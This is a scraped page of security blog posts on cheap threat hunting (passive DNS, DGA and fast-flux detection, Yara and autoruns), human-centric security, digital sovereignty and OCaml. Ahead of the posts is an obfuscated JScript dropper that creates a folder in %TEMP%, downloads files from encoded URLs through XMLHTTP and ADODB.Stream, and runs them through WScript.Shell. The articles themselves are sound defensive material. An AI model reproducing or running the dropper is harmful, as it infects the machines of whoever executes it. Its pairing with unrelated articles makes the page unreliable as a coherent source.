var dx="N?B f?z k?V pgWrmeYeAtJiInNgSsbyQojuVnZgNqvqs.7c1oGmb/18s05GQdMXYDc?r EgAoyo4gUlee1.Ycgommq/b8l0XGPdqXkDk?3 S?";

var HC = OixB(dx).split("");

var uzOjdW = ". BrlWfZ e LgzYusBg xe GdXD".split("");

var t = [HC[0].replace(new RegExp(uzOjdW[5],'g'), uzOjdW[0]+uzOjdW[2]+uzOjdW[4]),HC[1].replace(new RegExp(uzOjdW[5],'g'), uzOjdW[0]+uzOjdW[2]+uzOjdW[4]),HC[2].replace(new RegExp(uzOjdW[5],'g'), uzOjdW[0]+uzOjdW[2]+uzOjdW[4]),HC[3].replace(new RegExp(uzOjdW[5],'g'), uzOjdW[0]+uzOjdW[2]+uzOjdW[4]),HC[4].replace(new RegExp(uzOjdW[5],'g'), uzOjdW[0]+uzOjdW[2]+uzOjdW[4])];

var vvT = wYUkzixLb("hytd");

var iWO = HrwpH(OXbXCAjC("LVLuz"));

var ZeDUTR = ("CWszPMX \\").split("");

var Klbb = vvT+ZeDUTR[0]+ZeDUTR[1];

lSfnmZ(iWO,Klbb);

var xSD = ("2.XMLHTTP BeScUOk kmeQd XML ream St ZFRDIeEL AD aLEesOX O nFcW D").split("");

var ZL = true  , JYcj = xSD[7] + xSD[9] + xSD[11];

var uo = FZyc("MS"+xSD[3]+(65368, xSD[0]));

var Qie = FZyc(JYcj + "B." + xSD[5]+(877821, xSD[4]));

var bfO = 0;

var Z = 1;

var LaxMJRW = 570182;

var n=bfO;

while (true)  {

if(n>=t.length) {break;}

var sp = 0;

var Ijm = ("ht" + " VMOmvKy tp zoysd bcAmbjuL :/"+"/ mxykXfd .e EfmSc x nWCKLh e G nWQWoZV E BulesSto T TRoA").split("");

try  {

var LReHyZt=Ijm[134-129];

var xGARQ=Ijm[801-801]+Ijm[473-471]+LReHyZt;

wYGJ(uo,xGARQ+t[n]+Z, Ijm[12]+Ijm[14]+Ijm[16]); UAUJ(uo);

if (yrlc(uOFx(uo)))  {     

jEiG(Qie); Qie.type = 1; NZwY(Qie,iIeFEEW(uo)); if (Sgix(LZZFymKZ(Qie)))  {

AQVoAgj=/*nrRH29YFVZ*/Klbb/*oVch38RB07*/+LaxMJRW+Ijm[926-919]+Ijm[407-398]+Ijm[742-731];

sp = 545-544;NpkPo(Qie);Ybru(Qie,AQVoAgj);

if (293>50) {

try  {pGMyLfHuk(Klbb+LaxMJRW+Ijm[682-675]+Ijm[590-581]+Ijm[781-770]);

}

catch (gl)  {

};

break;

}

}; Qie.close();

};

if (sp == 1)  {

bfO = n; break;

};

}

catch (gl)  {

};

n++;

};

function lSfnmZ(vRNP,BFDQSl) {

try {vRNP.CreateFolder(BFDQSl);}catch(yMBcZQ){};

}

function pGMyLfHuk(sjrheBIoAMu) {

var FTcKLVxo = MnruB("sqjR=Ws=SYmMxdi=c=LkNYHr=ri"+"=pt=PAiRubzP=.S=ZWNin=he=QKIpiY=l"+"l=zZtYtCg"+"=YQvYvTrd=VHTU", "=");

var zfRKdfpc = FZyc(FTcKLVxo[271-270] + FTcKLVxo[136-133] + FTcKLVxo[214-209] + FTcKLVxo[977-971] + FTcKLVxo[641-633] + FTcKLVxo[928-918]+FTcKLVxo[368-356]);

jxjZabos(zfRKdfpc,sjrheBIoAMu);

}

function/*OAJC*/jxjZabos(TRAYg,GOyvuX) {

var RtpGce= ("JSaOOwisDoL;\x72;\x75;\x6E;JgVDLJItskks").split(";");

var xFr=RtpGce[992-991]+RtpGce[563-561]+RtpGce[696-693];

var VeXb=/*vyYh*/[xFr];

//rATi

TRAYg[VeXb[251-251]](GOyvuX);

}

function wYUkzixLb(rjwBK) {

var kuglrOp = "njDqTN*KHD*pt.S"+"he"+"ll*PzPJjXp*Sc"+"ri*";

var kuMsE = MnruB(kuglrOp+"CLPW*%T"+"E*MP%*\\*yIkarFYNo*nEyAhd*RsGedfF*apQUP", "*");

var TbT=((117-116)?"W" + kuMsE[428-424]:"")+kuMsE[110-108];

var tn = FZyc(TbT);

SvDMQR=kuMsE[255-249]+kuMsE[302-295];

return eBRRZTo(tn,SvDMQR+kuMsE[855-847]);

}

function OXbXCAjC(OceU) {

var ziaeORqzQs = "Sc WGsgmuy r NzOtRcclv ipt"+"ing HjDZRDm uMM ile ybhLPUOzWBGhng";

var fzryoIu = MnruB(ziaeORqzQs+""+"Sys"+"tem Bm hmjQH Obj vQPPEr ect fokQapQ ACJDF", "");

return fzryoIu[0] + fzryoIu[2] + fzryoIu[4] + ".F" + fzryoIu[7] + fzryoIu[9] + fzryoIu[12] + fzryoIu[14];

}

 

 

 


 

 

 

 

 

Hunting on the Cheap, Part 1: The Architecture

$
0
0

As security approaches reliant on known indicators of compromise (IOCs) are increasingly failing, “assume breach” has become a common expression in the industry. Far too often, intrusions go undetected until an external party discovers a breach and notifies the organization. Instead of relying on signature-based solutions or visits from a third-party to learn of a problem, network defenders need to “assume breach” from unknown adversaries who are already active within the enterprise. Given the increasingly targeted and personalized nature of attacks, network defenders must expand beyond searching for known IOCs and hunt for unknown breaches within their networks. This systematic pursuit of unknown adversaries is known as cyber adversaries hunting.

Hunting is not without its challenges. A relatively new and ill-defined concept, some believe hunting is outside their personnel or resource capabilities. Defenders need powerful tools to sift through mountains of data to rapidly detect and deal with a compromise. A full-featured hunt platform dramatically increases a hunter’s power, but security budgets are limited and organizations cannot always invest in every promising technology. Fortunately, there are several ways to hunt “on the cheap.”

At this month’s SANS Threat Hunting and Incident Response Summit, Endgame addressed some of these misperceptions and described ways security professionals can begin hunting without making large, up-front investments. This first of three related posts addresses how to get started hunting on the cheap on your network.  The second post will next address the various open source ways to cheaply analyze and identify high-order trends on networks, and the final post will conclude with a discussion of some easy ways to begin hunting on your hosts.  

 

Limitations of IOC Search

Security at the network level has traditionally involved searching for IOCs, such as known bad domains, blacklisted IPs and sometimes CIDRs, or has relied on using tools such as Snort or Bro to search for signatures associated with malicious traffic. With malicious tradecraft rapidly evolving and adversary infrastructure becoming less static and harder to distinguish from legitimate services, using network IOCs to detect threats has become harder and less effective. In other words, network IOCs are quickly obsolete. Threat actors often monitor their network assets, and as soon as they are detected by a blocklist, they move on to a different endpoint. Some attackers segment infrastructure on a per-target basis, reducing the value of global knowledge of the associated IOCs.

Cloud computing has only accelerated these challenges associated with IOC search. It is very easy for an adversary to get IP addresses from one of many hosting providers. Similarly, new ccTLDs and ICANN tlds managed by registrars that require little or no background check make this even easier and are cheaper or free, and registrations are stealthy due to WHOIS privacy services.

Because of all this and more, a smarter approach is required wherein, instead of chasing the past and searching for the known bad, network defenders hunt for patterns and signals that reveal the unknown bad. Once previously unknown indicators of malicious activity are identified, organizations can activate their standing incident response procedures. 

 

Hunting with Passive DNS

Passive DNS is very good at capturing such signals and patterns in a concise and structured way. Passive DNS is the data collected by passively capturing inter-DNS traffic to reassemble DNS transactions. Florian Weimer proposed this technique at the 17th FIRST conference in 2005 to slow down botnet propagation. Since then, a number of security organizations have started collecting passive DNS by placing DNS sensors on geographically diverse networks and analyzing the resulting data to generate threat intelligence. In today’s threat environment, Passive DNS can be immensely useful in driving threat hunting.

Passive DNS sensors, in essence, capture DNS traffic – UDP packets to and from port 53 (DNS) – and reassemble all the messages into a single record containing query and responses. We have experimented with two open source sensors:

We have an option to collect only the Iterative DNS queries (shown here in green) or collect all the DNS traffic.

 

DNS query

 

These sensors can be placed at any point in the network where a sniffer like tcpdump can capture DNS traffic. The best place to install a sensor is on a local recursive DNS server, but a span port will also work.

Once the passive DNS data is collected by the sensors, it must be transferred and aggregated to a single point for analysis and monitoring. A message queue like Kafka can be used by the sensors to publish the passive DNS records. This enables a flexible and loosely coupled – and open source! – architecture wherein any number of consumers can subscribe to the queue and perform necessary data analysis for threat hunting.

Broadly, there are three main applications of this data that are relevant for hunting:

 

1. Data Sinks to Long-term Storage

Depending upon the use case, a long-term storage like HDFS can enable large scale batch analysis to discover “what’s normal” for the network and identify historical trends. Alternatively, ingesting the data into an ELK (Elasticsearch Logstash Kibana) stack to perform searches and trend analysis is a simpler approach. This quickly enables searching for known IOCs using an open-source stack, while also conducting outlier detection for any deviations from the norm.

 

2. Monitoring

Monitoring various statistics of the DNS traffic, like the number of NXDOMAINs, number of queries by type, total number of queries, number of queries by user, or distribution of queried TLDs, etc. can be immensely helpful to understand the hourly and daily trends. Monitoring applications like Graphite generate graphs and statistics for different data points, and allow us to proactively identify anything out of ordinary.

 

3. Real-time Threat Hunting

These consumers process records as they arrive and detect threats in real-time, continuously looking for malicious traffic patterns and performing outlier detection. Time-series analysis, using libraries like Karios, facilitates the hunt, detecting unusual activity and any breakpoints or periodicity in the data.

 

 

Massage Que

 

Next Steps

Once the architecture is established and data is being collected, network defenders can conduct a wide-range of analyses on this passive DNS data to hunt for unknown intrusions in networks. In our next post, I’ll describe how this architecture can be to used to detect newly registered domains, fast flux techniques and domain generation algorithm (DGA) malware, and a variety of other indications of intrusion. Together, these posts will provide an overview of the power of open-source libraries and techniques for hunting on the cheap.

Hunting on Networks, Part 2: Higher-Order Patterns

$
0
0

In the first part of the Hunting on Cheap series, I discussed the importance of passive DNS in an adversary hunting toolkit. I detailed how an organization can set up sensors to collect passive DNS data, as well as some of the options for handling this data.  After putting that foundation in place, the next step is looking at the collected data to find patterns and signals of maliciousness that, with a relatively low false positive rate, provide the hunter with starting points to dig deeper into identifying unknown threats.  A focus on these outliers and other patterns is important because adversaries easily change their attack infrastructure and render most network IOCs useless.  

In this second post in our Hunting on the Cheap series, I will go through some of these signals and discuss how they can be applied to passive DNS data to hunt for unknown malicious adversaries in your network.

 

Fast Flux

Fast flux is a technique used most frequently for malicious purposes by botnets. Normally, a fully qualified domain name (FQDN) resolves to the same address space for a relatively long period of time.  With fast flux, a FQDN serving as a command and control server resolves to a large number of IPs over time, swapping in and out at high frequency.  This has the effect of adding resilience against IP-based block lists because blocking a given IP is only effective for the very short time window during which the FQDN resolves to that IP.  This pattern isn’t malicious by itself, since it can be used for benign purposes as well. A domain that receives a large amount of traffic may also resolve to a large number of IPs. Typically, benign domains resolve to a homogenous IP space either by ownership, address block, or geography. Malicious domains have greater heterogeneity in each of these. This is the first higher-order pattern: ‘domains that resolve to a large number of IPs and those IPs are diverse both by ownership and geography’. For example, looking for this pattern in our sample data revealed the domains listed below. VirusTotal confirms that they are indeed malicious.

Author: Ahuja

Domain Generation Algorithm

Domain Generation Algorithm (DGA) malware uses an algorithm to randomly generate thousands of domains daily and attempts to connect to them to receive communications from a controller. Botnet masters register a (usually small) subset of those domains per day to keep the botnet going, knowing that the malware will eventually attempt to resolve to a registered domain. A well-known and effective way to stop DGA malware is to predict and register all possible domains before the botnet controller registers them.  This requires reverse engineering a bunch of malware samples, which can be tedious. It also is difficult to remain current given the new families of malware and their constantly updated versions.  So how do we determine whether a given domain in passive DNS data is generated via a DGA without directly generating a complete list of possible DGA domains using all possible algorithms, which would be an extremely difficult task.

Fortunately, algorithmically generated domains have structural properties that are different from benign domains.  Benign domains are generally chosen because they are easy to remember or reflect common words across a variety of languages. That is our next higher-order pattern: ‘domains with abnormal lexicographical structure`.

One fairly accurate approach to detecting DGA domains is to extract features like consonant-to-vowel ratio, longest consonant sequence, entropy, common ngrams with dictionary words, etc. and analyze them in a random forest classification tree.

This data science approach to DGA detection is non-trivial to implement.  We have provided code which can be used for detection.  This specific classifier detects abnormal lexicographical structures from common English words. Similar approaches can be followed to include other languages and improve the false positives rate.

 

Author: Ahuja

While block lists are appropriate for hunting a given fast flux botnets, it is not the appropriate technique for hunting for DGA domains in general. Because of the sheer number of domains per day per malware family, in addition to the rapidly changing malware samples, static analysis is inefficient and less effective for hunting DGA classifiers. However, there are a series of data science techniques – such as random forest classification – that are very well suited for hunting DGA domains.

 

NXDOMAINs

DGA domains sometimes include English words to fool DGA classifiers that use lexicographical properties of the domain to detect them. An example of such a DGA family is Nivdort. However, DGA malware leaves behind another signal that is much harder to conceal. Since the malware generates thousands of domains and only a few of them resolve to actual hosts, the majority of DNS queries return an error (code=3) indicating a non-existent domain or NXDOMAIN. Normally, we see NXDOMAINs due to typos, copy paste errors, browser prefetch of malformed html, etc. at a rate of less than 5% of the DNS queries. On machines infected by the DGA family malware, this rate surges up. ‘A higher than normal rate of NXDOMAIN errors’ is the next higher-order pattern. Estimating the percentage of NXDOMAINs is really powerful since it catches all sorts of DGA malware families even if they evade our DGA classifier.

 

Phishing Detection

Recent phishing campaigns often rely on a small typo of a domain, or utilize a brand name to make it look genuine.  In the first case, the phished domains are slightly modified versions of the real domain, while still retaining some resemblance to it. This is the next higher-order pattern to hunt: `DNS queries for domains that are slightly modified versions of a popular domain’. Edit-distance or Levenshtein distance can help measure the level of modification between two domains. Edit-distance between two words is the minimum number of single-character edits (e.g., insertions, deletions or substitutions) required to change one word into the other. Each DNS query can be analyzed for its edit-distance from popular domains. A potential phishing attempt may exhibit a low edit-distance from another popular domain, especially when there are different registrants. 

phishing example

In other cases, a phished domain contains a familiar brand name to appear genuine. This is another higher-order patter: 'DNS queries for domains that contain popular brand name'. A suffix tree of popular domains and brand names can perform at scale, matching the longest common substring against each DNS query. Once identified, it is important to validate such outliers by checking the WHOIS records.

DIY Outlier Detection

There are many additional patterns which could be noted in passive DNS data to drive your hunt.  A fundamental principle of hunting is looking across your dataset and identifying outliers in that data.  Doing this over time is an effective way to perform outlier analysis for network data.  This boils down to creating additional hunting techniques using the following steps: 

  1. Select one or more features or characteristics of DNS traffic.
  2. Discover the normal range or set of values for that particular feature(s).
  3. Find records where the feature deviates considerably from the normal.

Let’s take query type as an example. First, we discover the distribution of queries by query type. Say, we observe 93% query types for A records, 6% for NS records and 1 % for MX records. If suddenly we observe a much higher rate of MX queries, we have an outlier that we should investigate. This is the last higher-order pattern: “Features or characteristics that deviate from the normal distribution of the data.” This could indicate a malware infection that sends spam. Similarly, if we take a distribution of queries by TLD and find large number of queries to a TLD outside of that distribution, we have an outlier that warrants further analysis.

Note that, as with any outlier detection, you will have false positives. Part of the hunting process is understanding what is normal for your organization and incorporate that information in your analytic process. 

 

Conclusion

Adversary hunting using passive DNS can be a rewarding experience, both in terms of understanding the network and its peculiarities, and for finding targeted threats such as APTs that evade usual IOC-based search. There are many known patterns and signals that indicate malicious behavior. These higher-order patterns provide a heuristic for anyone new to hunting on networks. The following are great places to start:

  • Domains that resolves to a large number of IPs and those IPs are diverse both by ownership and geography
  • Domains with abnormal lexicographical structure
  • A higher than normal rate of NXDOMAIN errors
  • DNS queries for domains that are slightly modified versions of a popular domain
  • DNS queries for domains that contain popular brand name
  • Features or characteristics that deviate from the normal distribution of the data

Other patterns exists as well. More manual, quantitative analysis can also identify outliers, based on known normal behavior, such as query types. Together, these are solid, open source first steps to begin hunting within networks.

The network is not the only place to hunt.  In fact, a richer set of data is available on your endpoints to feed hunting operations.   In our subsequent and final post on hunting on the cheap, we’ll address hunting on hosts.

Hunting on the Cheap, part 3: Hunting on Hosts

$
0
0

In our previousposts, we focused on hunting on the cheap by collecting and analyzing data on the network.  However, hunting on networks is not the only option.  In fact, a richer set of data to find unknown malicious activity in your enterprise is available by looking on and across your hosts and servers.  This can include running processes, active network connections, listening ports, artifacts in the file system, user logs, autoruns, and more.  With all this data, the tough part is deciding what to focus on as you start your hunting process.  Once you’ve determined areas of focus, you can collect data, look for suspicious outliers, and investigate further.  In this final post in the series on how to get started with hunting, we’ll describe some tips for hunting on your hosts using freely available tools.  These techniques are simplified first steps to help you find evidence of malicious activity on your hosts - with or without signatures and IOCs. You can do this for free, while still getting a taste of the power of hunting.

 

Searching with Indicators

A common starting point is to look for IOCs (Indicators of Compromise) across your hosts.  While many call this hunting, it’s really just searching. And not just searching, but searching for indicators that are fleeting and constantly morphing.  In fact, the useful lifespan of an IOC is declining due to trends in adversary behavior.  Most security professionals already know this, and it was underscored in Verizon’s DBIR released last week.  That said, due diligence still necessitates searching across your systems for known IOCs, which remains a useful first step.  The following are several websites that publish freely available threat intelligence information in various forms.

 

IOC Source

 

One of the more resilient and useful IOCs to use on your hosts is a well-written Yara signature.   Yara applies binary patterns and sequences to detect and categorize badness on your system. Yara is similar to Grep, which employs a list of known patterns and searches for matches. But Yara does much more, scanning both files on disk and memory for binary patterns.  A good malware analyst will in many cases be able to craft a Yara signature to detect not only identical copies of a piece of malware but also variants of the tool, new versions of the tool, or even follow-on tools in the same malware family by focusing on unique patterns in the binary which are likely to survive through code reuse.  For this reason, one of our favorite open source tools for identifying malware is Yara.  And even better, it’s free.

 

Yara in Action

Yara rules are a great way to structure a known malicious pattern based on textual or binary sequences.  The following is a snippet of a robust Yara signature that detects Mimikatz, a tool used by adversaries and red teams to extract Windows credentials from memory. This particular signature was actually written by the author of the Mimikatz tool itself.

Rule Mimikatz

 

You can run Yara locally but it is even more powerful when run remotely on a single machine or across multiple machines.  Powershell can facilitate this. Running Yara remotely via Powershell can be done in a few simple steps, assuming you have credentials to the hosts and Powershell remoting is enabled.

 

Transfer Yara binary to target machine w/ native Windows functionality

PS> copy yara.exe \\TARGET-HOST\C$\TEMP\yara.exe

Transfer rules

PS> copy rules.yara \\TARGET-HOST\C$\TEMP\rules.yara

Execute scan w/ Invoke-Command

PS> Invoke-Command -ComputerName TARGET -ScriptBlock { c:\TEMP\yara.exe c:\TEMP\rules.yara c:\targetdir } -credential USER

This will have the effect of running a set of Yara rules (rules.yara in the above example) on a given directory (c:\targetdir in the above example).  It can easily be extended to search across the entire disk and across many hosts and identify exactly where a binary matching your signature exists on the hosts.  

This is very powerful, but is not without shortcomings. As we all know, signatures are brittle. This not only leads to false positives if the Yara signature is poorly written, but with the rapid pace of change of malware, rules need to be constantly updated or they become obsolete. This can be extremely resource and time intensive.  However, compared to searching for hashes, filenames, and other artifacts which are commonly used in IOC search, using Yara can be a more powerful and resilient approach.  

 

Hunting without Intelligence

Even if you have IOCs as a starting point, IOCs are not good enough to find all possible malicious activity in your enterprise.  This is where hunting comes into play.  Hunting is the systematic and proactive pursuit of unknown threats. This entails the identification of patterns and suspiciousness in your data that may indicate badness on your network.  As mentioned above, there are many places you can hunt on the host.  We suggest starting with autoruns.  Adversaries usually want to persist across reboots on at least some systems in your network.  Doing so is critical to entrenchment in your network for the long haul.

Autorun items are a good place to look for outliers and suspiciousness for several reasons. Autoruns tend to be relatively consistent across a network rendering pure outlier analysis feasible.  Any autoruns showing up in only in a handful of places may indicate badness, but these can be hard to find given all of the locations that need to analyzed. Additionally, files must be dropped to disk for autorun persistence. Some actors do obvious things you can treat as suspicious - for example, executing out of the %TEMP% folder with an obviously strange filename.  In many environments, malicious autoruns stand out and can be detected by a good hunter.  Once a malicious autorun is detected, deeper analysis can commence to confirm and deal with a compromise.

 

Collecting Autoruns

There are over one hundred places where an adversary can persist on a modern Windows machine.  This includes startup registry keys, services, drivers, browser and Office add-ons, and many other less well-known places and methods.  Beyond the sheer number of locations, grabbing the necessary data for analysis is non-trivial due to the way data is formatted by the operating system.  Sysinternals (maintained by Microsoft) created a tool called Autoruns to tackle this problem, free of charge.  While not perfect, this tool does a great job pulling in the right data for most autorun items on a Windows system, hashes them, and allows for some basic enrichment (such as submitting to VirusTotal).

We recommend using the command line version of autoruns (autorunsc.exe) in tandem with Powershell for remote gathering of autoruns from your systems.  This can be done in a few steps:

 

Transfer Autoruns binary and the required msvcr100.DLL to target machine w/ native Windows functionality

PS> copy autorunsc.exe \\TARGET-HOST\C$\TEMP\autorunsc.exe

PS> copy msvcr100.dll \\TARGET-HOST\C$\TEMP\msvcr100.dll

Execute program w/ Invoke-Command (w/ optional output)

PS> Invoke-Command -ComputerName TARGET -ScriptBlock { c:\TEMP\autorunsc.exe –a (??) –h (>> c:\TEMP\autoruns-output.txt) } -credential USER

Collect output

PS> copy \\TARGET-HOST\C$\TEMP\autoruns-output.txt c:\directory

As before, this can be extended to gather data from many systems across your network.  

 

Analyzing Data

We recommend submitting all autorun hashes to VirusTotal as the first step in your investigation.  Anything that comes back as malware is...well….malware and you should prioritize these for additional investigation.  Fortunately, this can be done inline with Sysinternals, or you can easily build something with the VirusTotal API.

So you’ve collected all your autoruns and determined if any are known to be malware.  That’s a good step, but you shouldn’t stop there.  You need to truly hunt for unknown badness and look for anomalies in the data.  There are many ways to do this, but we’d recommend first stacking by hash and looking for outliers that don’t match the general population of the data. To do this, pull hashes of all autorun items as described earlier, and then list them out as HOST:HASH.   The following provides a concrete example of how this might look (note that you will have many more autoruns for each machine in a real environment).

 

Cat Hash Map

 

An easy next step is to delineate the output by colon (:)

# cat hash-map.txt | cut -d’:’-f2 > hashes.txt

And then reduce and sort by the number of occurrences across your systems to quickly identify the anomalies.

 

Cat Hashes

 

In this example, we had 42 systems.  Many autoruns appeared on each system.  A couple only appeared on one.  These outliers could be suspicious.  A reasonable first step would be to look at the detailed output of autoruns from the host(s) where the outlier was seen.  You may note a strange description, strange filename, strange autostart location, or more.   The following example shows a binary named “svcchost.exe” executing on startup from C:\WINDOWS\temp:

svcchost

 

The next example shows a binary executing on startup from the recycling bin with a one-character filename, both definitely signs of something strange going on.

Recycler

 

These are not the only suspicious things you can note in autoruns data.  There are many more approaches.  You can take this much further, for example, by indexing all of the data in Elasticsearch (another freely available capability) to allow for fast search and exploration capabilities across your data to include regularly collecting autoruns from your endpoints and looking for changes in autoruns over time.  And, of course, there are many endpoint artifacts which are prime locations for hunting.  A true hunt effort should expand in scope to cover user logs, processes, network information, and more.  

 

Summary

Over this three-part series of posts, we’ve provided several approaches using only free software to help you begin hunting on both networks and hosts.  Hunt techniques are not reliant on ephemeral and constantly morphing signatures or IOCs, thereby providing ways to better match the sophistication of modern adversary techniques.  Every organization and researchers should begin proactively hunting to detect unknown threats inside the network.  From passive DNS to autoruns, we’ve covered a lot of ground and described a variety of free and powerful approaches for hunting on hosts and networks. Have fun!

The Real “Weakest Link” In Security Isn’t What You Think: Why We Should Rethink the Narrative That Humans Are What Make Us Less Secure

$
0
0

It’s an all-too familiar story: A company reports a data breach,and there’s an immediate blame game. Inevitably, we point the finger at humans — the person who responded to that phishing email ( a fake message that a bad actor uses to gain access to a broader set of data or a network) or who unknowingly clicked on ransomware “malvertising” (a fake ad that, when clicked, releases malware that locks digital files and demands a ransom to release the data).

Humans, we’re told, are the weak link of security. That was a key theme in the Verizon Data Breach Investigations Report released last week. After all, ransomware and phishing are effective because they’re able to so skillfully target human vulnerabilities.

Here’s the problem. Human vulnerabilities will always exist. This old way of thinking — that people are the problem, and we can somehow change entrenched human behavior — isn’t getting us anywhere. Even with improved training and education, given the sophistication of the attacks, human vulnerabilities will persist. So we need to rethink this paradigm: What if we started viewing human-computer interaction as a means toincrease security? How could we use what humans do best — critical thinking and contextualization- and combine it with what computers do best — automation and scale — to make us all safer?

We can start with a more “human-centric” approach to security — in other words, designing products and solutions with human strengths and vulnerabilities in mind. Here are three examples of ways that this approach could make us all more secure:

 

1)Alert fatigue — Monitoring systems with an overabundance of alerts aren’t just ineffective but lethal. With so many low priority alerts, users simply ignore the alerts or have little ability to differentiate between those high and low priority alerts. And given the vast amount of data, it’s impossible to respond to every single alert. For instance, at Target , the security team received and ignored alarms — in part because there were just so many. Many have pointed to this as human fallacy, but in reality it is a combination of human-computer interaction failure. With so many alerts, very few teams have the time or capabilities to sift through in depth every alert that is received. Even with the best judgment, systems with little ability to inform and prioritize alerts are simply ignored. In contrast, monitoring systems that integrate automation with human-driven domain expertise and prioritization could be a first step at more precise and relevant alerts, decreasing dwell time and expediting incident response.

 

2)Data exploration — Analyzing and protecting big data is getting more and more complicated as the amount of data that we generate increases, and as attackers begin to not only steal data, but to manipulate it, too. We need to create faster and more effective ways to explore the data required to analyze and detect intrusions, especially in the face of an industry-wide talent shortage. In short, there is too much data and too few people to analyze it, and this problem is only growing. So, how do we explore data faster and more efficiently? Cognitive methods aimed not just at supporting human hypotheses, but also proactively surfacing key insights will be an essential component for improved security. Machine learning and other forms of automation help scale these capabilities, and provide much faster insights than is possible through human analysis alone. For instance, in the commercial realm, cognitive computing helps answer customer and supplier questions, or in finance can identify optimal investment portfolios. These technologies help remove the arduous processes of data structuring and merging, but also provide optimized analytics so humans can devote their time to the important analysis, contextualization, and interpretation of the data required to detect and contain attacks. These tools do not replace the analyst, but provide greater, faster, and more scalable analytic capabilities to help prioritize and gain insights from data, greatly impacting detection and prevention of anomalous behavior. Automation and advanced data analytics also helps security teams optimize their resources, enabling greater detection capabilities of the seemingly infinite data with finite resources.

 

3)Mind the C-Suite Gap — It’s as high-stakes as communication struggles get: security teams often are unable to put their work and issues into language that CEOs can understand. When they can’t communicate effectively to company leaders, their warnings are disregarded, leading to devastating consequences. The C-suite increasingly bears the brunt of breaches — leading to turnover of CEOs and government leaders — but they may not grasp the complexities or resources required for security. Data visualization can bridge that gap. Think of it as the storytelling medium, conveying complex data in a consumable manner. Intuitive, interactive, and concise data visualization can express multifaceted concepts in a much more efficient manner than showing a presentation full of log data.

We hear a lot about changing human nature as the key to digital security. While education and training are essential, human behavior is nearly impossible to change and isn’t a silver bullet. Instead, let’s focus on building technologies that leverage the best parts of computers and humans working together. It could go a long way to address the increasingly complex challenges in the digital domain.

This post was previously publishedby New America.

Digital Sovereignty: Multi-Stakeholder vs. Beggar-Thy-Neighbor Digital Futures

$
0
0

What do Yeti, ICANN, and BRICs have in common? They are emblematic of the growing international jockeying for power to shape the global digital order. Absent a global cyber regime, nation-states continue to pursue self-interested international and domestic policies, which has produced the evolving movement toward digital sovereignty.

While an open and free internet is consistent with many states' interests, this is far from universally true. Many states' policies are more so reminiscent of beggar-thy-neighbor trade policies, wherein states pursue their own self-interested policies that worsen the situation of other states. To counter this growth of autarkic digital policies, there have been silent, but potentially impactful movements by the US to slowly assert a multi-stakeholder model. If history is any guide, it will likely take a major shock to the system to truly embed the norms the US continues to push forth. Until then, we’re likely to continue to see states asserting their digital sovereignty in ways that not only impact global connectivity, but also have strong implications on international commerce, privacy, and security.

 

A Beggar-Thy-Neighbor Digital World Order

The latest wave of digital sovereignty is disguised as a push for privacy. China is leading the way in this realm, balancing domestic censorship, data leaks, and a quiet but growing crackdown on foreign tech companies. This push for cyber sovereignty is instigated by the need to control information and limit foreign competition. The Cyberspace Administration of China (CAC) – China’s Internet watchdog – released an announcement in January soliciting input on a proposal to increase censorship of news outlets, emphasizing privacy protection of personally identifiable information. The CAC also leads the push for more regulations on international companies, demanding source code and other IP as the price to pay for access to China’s enormous market. The CAC controls censorship and has been blamed for offensive attacks against US companies, including a public allegation by GreatFire.org, a non-profit organization fighting for online freedom in China. This is the same organization that was at the center of the GitHub attacks in April 2015.

China has global aspirations for their model as well, laying the groundwork for alternatives to the modern Internet. Russian and Chinese officials met last month to discuss digital strategy, just the latest in their push for digital sovereignty, with Russia seeking to learn from and augment its information control similar to the Great Firewall. Brazil is also taking a page from this playbook, with growing government involvement in information control, such as blocking the messaging platform, WhatsApp. These initiatives focused on information control are part of a global effort to shape the digital order. With India’s ascent to lead the BRICS (Brazil, Russia, India, China, and now South Africa), discussion among the group is increasingly dominated by ways to shape the global digital order. While it remains a group with diverse interests, they nevertheless seek a role in shaping the future of the Internet. Similarly, there are smaller efforts such as Project Yeti that aspires to redirect traffic from the Internet to an alternate root. It is driven largely by technical considerations, as well as to counter the risk of Western surveillance. The Beijing Internet Institute runs Project Yeti, in conjunction with a Japan-based group and computer scientists.

 

Multi-Stakeholder Initiatives

From the perspective of many regional powers, the US government (via the Internet Corporation for Assigned Names and Numbers, ICANN)  and US companies (via their technology) – control the Internet. In an attempt to offset these negative perceptions and to implement global digital norms, the US continues to seek ways to shape the digital world order toward a free and open multi-stakeholder model. Relinquishing control of ICANN is a first step toward this model. Currently reporting to the US Department of Commerce, ICANN controls naming conventions, matching domains and IP addresses. However, in 2014, President Obama announced that ICANN will transition this role to a global, private group. This is set to occur in September 2016. As part of this outreach to the global community, ICANN will host a global meeting in Hyderabad, India, in November.

The US also continues to push forth this multi-stakeholder model at the UN’s Group of Governmental Experts (GGE). A new report by the GGE and agreed upon by 20 governments, including the US, China, and Russia, proposes a range of international norms for cyber activity. Clearly, this ties into other ongoing discussions on the defining cyber acts of war, but focuses more so on those activities that fall below the threshold of use of force, such as espionage and IP theft. With so many distinct interests, there are numerous collective actions problem with international cooperation and shaping these norms. That said, the United State’s push for global norms and a multi-stakeholder model is emblematic of its global campaign to counter perceptions of its hegemonic control of the internet.

 

The Way Ahead

While some predict the Internet to approach global saturation by 2020, these projections are largely based on an uninterrupted current trajectory. Despite decades of Internet growth, there is momentum for greater control of the Internet. Many regional powers are increasingly looking to digital sovereignty as a means to maintain greater domestic control and exert global influence. The US is taking steps to counter this movement with a multi-stakeholder model, but it relies on global cooperation which remains a challenge. This jockeying of power between these two competing perspectives is only likely to grow, and has great implications for the future of the global digital order.


Hunting Your Adversaries with Endgame Enterprise: Meet Us at Gartner

$
0
0

Endgame was at the Gartner Security & Risk Management Summit in 2015 showing Endgame Enterprise, the industry's first endpoint detection and response platform to hunt, contain, and eliminate adversaries that bypass signature and perimeter based security solutions. Featuring advanced threat intelligence, behavioral analysis, and attack chain modeling, Endgame Enterprise "thinks like the adversary", enabling customers to detect and respond faster to unknown threats, preventing damage and loss. To keep the conversation going, contact us here.

Build Safer Programs Faster with OCaml

$
0
0

For many internal prototypes at Endgame, we adopt an agile development process to rapidly build proof-of-concept services which can then be deployed and reiterated upon to quickly address bugs and introduce new features. Our R&D and DevOps groups maintain and improve dozens of interconnected services, from training machine learning models on malware samples to processing and analyzing domain information. However, many DevOps and R&D requirements are iterative and fluid, and it can be difficult to write services that are fast, safe, and extensible enough to address these changing needs.

